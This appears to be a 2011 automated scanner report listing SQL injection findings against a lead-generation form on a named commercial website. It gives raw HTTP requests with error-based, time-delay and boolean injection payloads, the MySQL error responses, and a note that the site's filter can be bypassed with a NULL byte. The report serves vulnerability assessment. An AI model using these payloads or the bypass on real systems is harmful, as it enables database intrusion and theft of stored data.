select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... ),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=50002&iusrc='+(select 1 and row(1,1)> ...[SNIP]...
Request 2
GET /ppc/leadflow/hins00/project.php''?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1 Host: www.insideup.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __utma=253555158.1232491105.1300018899.1300018899.1300018899.1; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2
Response 2
HTTP/1.1 200 OK Date: Sun, 13 Mar 2011 23:00:33 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=1prdg020nv1ktm3l3m5s6d99f0; path=/ Content-Length: 3917 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]...
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 4, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request
GET /ppc/leadflow/hins00/project.php'?catId=50002+OR+X%3d'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=4dobj8gl0r8jekvsqrcejsr783; JSESSIONID=30ABD5D342EFB2121A067D10C4B56069; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:03:23 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 7238 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=50002 OR X='ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accoun' at line 5
The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the Referer HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.google.com/search?hl=en&q=' User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:02:38 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=fkkgtkj77dkucf6mj0nghqn880; path=/ Content-Length: 7310 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&attributeId_342_g=2017__Accounting/Finance&attributeId' at line 5
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the User-Agent HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)' Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:02:36 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=rfhbumq8b6d9vc43r7frsijsi5; path=/ Content-Length: 7310 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&attributeId_342_g=2017__Accounting/Finance&attributeId' at line 5
The address parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the address parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 04:15:50 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 7118 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... ibles&attributeId_555_t=&attributeId_556_t=&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=2742__None currently&attributeId_487[]=3199__Not sure&attributeId_488[]=3205_' at line 5
The address parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the address parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:19:25 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 7190 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'='1&attributeId_422[]=2742__None currently&attributeId_487[]=3199__Not sure&at' at line 5
The address parameter appears to be vulnerable to SQL injection attacks. The payload '%20and%201%3d1--%20 was submitted in the address parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--'%20and%201%3d1--%20&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:01:20 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=v5m3ilr8nucui2cd0b0frvhjk1; path=/ Content-Length: 7406 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--' and 1=1-- &attributeId_342_g=2017__Accounting/Finance' at line 5
The attributeId_342_g parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_342_g parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance'&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:12:40 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 7094 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'SELECT pg_sleep(30)--&attributeId_421=2739__No&attributeId_422[]=2742__None curr' at line 5
Request 2
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance''&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:12:40 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53453
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The attributeId_342_g parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_342_g parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--&attributeId_342_g=2017__Accounting%2fFinance'&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:01:22 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=shvvhe4cbn0b8srqtfrkmfu914; path=/ Content-Length: 7318 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&attributeId_342_g=2017__Accounting/Finance'&attributeI' at line 5
The attributeId_343_g parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_343_g parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9'&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:12:51 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 7094 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'SELECT pg_sleep(30)--&attributeId_421=2739__No&attributeId_422[]=2742__None curr' at line 5
Request 2
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9''&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:12:52 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53453
